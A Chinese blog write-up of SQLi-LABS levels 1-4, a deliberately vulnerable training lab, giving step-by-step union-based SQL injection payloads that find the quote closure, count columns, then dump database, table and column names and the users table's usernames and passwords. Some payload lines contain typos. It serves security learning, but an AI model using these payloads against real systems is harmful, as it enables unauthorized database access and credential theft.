SQLi-LABS_1-4

最新推荐文章于 2024-09-12 01:15:37 发布
最新推荐文章于 2024-09-12 01:15:37 发布
阅读量145 收藏
点赞数
分类专栏: SQL Injection 文章标签: mysql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44466110/article/details/105002216
版权

SQLi-LABS

Less-1-4

Less-1 Error based

查看是否可以注入:

  1. 输入?id=1 发现可以

  2. 尝试闭合’发现报错

  3. 分析报错,确认闭合方式为单引号的字符型注入
    在这里插入图片描述

进行字段的判断

  1. 进行order by

  2. 尝试到4发现出错

  3. 所以判断字段为3
    在这里插入图片描述

进行字段查询

  1. 使用联合查询union select

  2. 使用前需要将参数?id=1改为?id=-1,否则无法在对应位置显示

在这里插入图片描述

  1. 发现2,3位置存在注入,所以在2,3位置进行替换

  2. 将2,3位置替换为database(),version(),user()…来获取信息
    在这里插入图片描述

探测表名

  1. 获取了数据库名后,进行对表名的探测

  2. 使用 union select group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
    在这里插入图片描述

  3. 发现users这个表名,.

探测字段名

  1. 获取表名后,继续向下探测

  2. 使用union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+
    在这里插入图片描述

  3. 发现username和password,x.x

探测数据

  1. 直接点吧

  2. union select 1,group_concat(username),group_concat(password) from users --+
    在这里插入图片描述

less2-4

因为这些很类似,只是闭合方式不同,所以放在一起,后面和上面的类似,就不会每步都截图了-.-

Less-2

  1. 加单引号 报错,发现是数字型
  2. ?id=1 oder by 4 --+ 报错
  3. ?id=-1 union select 1,2,3 --+
  4. ?id=-1 union select 1,database(),user() --+ 获取到了库名
  5. ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 获取到表名
  6. ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+获取字段名
  7. ?id=-1 union select 1,group_concat(username),group_concat(password) from users --+

Less-3

  1. 确定注入方式为’),
  2. ?id=1’) order by 4 --+报错
  3. ?id=-1’) union select 1,2,3 --+确定位置
  4. ?id=-1’) union select 1,database(),user() --+ 获取到了库名
  5. ?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 获取到表名
  6. ?id=-1’) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+获取字段名
  7. ?id=-1’) union select 1,group_concat(username),group_concat(password) from users --+

Less-4

  1. 确定注入方式为")
  2. ?id=-1") union select 1,2,3 --+确定位置
  3. ?id=1") order by 4 --+报错
  4. ?id=-1") union select 1,database(),user() --+ 获取到了库名
  5. ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 获取到表名
  6. ?id=-1’") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+获取字段名
  7. ?id=-1") union select 1,group_concat(username),group_concat(password) from users --+
我先叉个腰
关注
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs(1-4)
qq_46110224的博客
11-28 256
sqli-labs(1-4)
sqli-labs闯关1-4关
qq_44111282的博客
06-16 215
第一关 首先进入关卡后出现界面如下: 对目标url进行传参?id=1出现正常界面 尝试输入id=1 and 1=2发现页面回显正常,说明不是数值查询 接着输入id=1'发现页面回显和之前不一样,说明可能存在注入漏洞 接着输入id=1'--+发现页面回显正常,所以可以知道这里是字符型注入,这里的- -(空格)是在数据库中表示的是注释的意思,后面的+是因为浏览器在发送请求时会自动将空格舍去,而+则会被转义为空格 接着进行字段数的尝试,输入id=1' order by 2--+页面
sqli-labs 1~4关详解
qq_45756971的博客
10-15 495
点进去题目:提示我们输入题目id,第一题,所以我们输入?id=1,回车即可。如图:首先可以判断这里接受的是一个GET请求,先在1后面加一个’ 发现报错,说明这里没有过滤掉引号,所以这里是一个注入点 SQL注入通常有两种类型,整形注入和字符型注入,那么我们要判断这是哪种注入就要分析这里的报错语句,报错信息中共有5个单引号,"实际上是两个单引号,最外面的两个是报错信息的提示引号,'1’两边的引号是后台代码的引号,多出来的就是我们加上的,因为这里给输入的1加上了引号所以后台接受的是字符型,那么我们在后续的注入中需
sqli-lab1到4关详解
cangyu51462的博客
04-12 440
sqli-lab 1-4
Sqli-labs之Less1-10
Mi1k7ea
04-14 4563
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs合集之环境搭建
qq_54190167的博客
07-10 292
Sqli-labs的环境搭建
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs (less1-less4)
Xi4or0uji
07-24 1750
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
MySQL】表的操作【有关表结构的操作】【创建、查看、删除、修改表结构】
最新发布
aaa114514aaaa的博客
09-12 1240
对于mysql数据库的表的结构的查看,创建、删除、修改、【对字段的添加、修改】
基于SpringBoot+Vue+MySQL的考研互助交流平台
程序员大金的博客
09-11 738
基于SpringBoot+Vue+MySQL的考研互助交流平台,附源码。
基于SpringBoot+Vue+MySQL的教学资源共享平台
程序员大金的博客
09-11 990
基于SpringBoot+Vue+MySQL的教学资源共享平台,附源码。
基于SpringBoot+Vue+MySQL的瑜伽馆管理系统
程序员大金的博客
09-11 1330
基于SpringBoot+Vue+MySQL的瑜伽馆管理系统,附源码。
Navicat On-Prem Server 2.0 | MySQL与MariaDB基础管理功能正式上云
Navicat 官方账号
09-11 1251
近日,Navicat 发布了 Navicat On-Prem Server 2.0 的重大版本更新。这标志着这款自2021年首发的私有云团队协作解决方案迈入了一个崭新的阶段。此次2.0版本的飞跃性升级,核心聚焦于MySQL与MariaDB基础管理功能的全面革新与强化,赋予了用户的操作灵活性与高效性,进一步助力团队在私有云环境下实现无缝协同作业。
mysqlmysql之优化
zerotoall的博客
09-11 2839
数据库优化   一、数据库硬件优化(选型)    1.一般数据库选择    2.数据库类型    3.硬件选型    4.操作系统优化    5.应用端优化   二、创建数据库    1.创建一个库一个表,并插入100万数据    2.查看数据可用性    3.进行压力测试   三、数据库参数优化    1.Max_connections    2.back_log    3.wait_timeout和interactive_timeout   
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值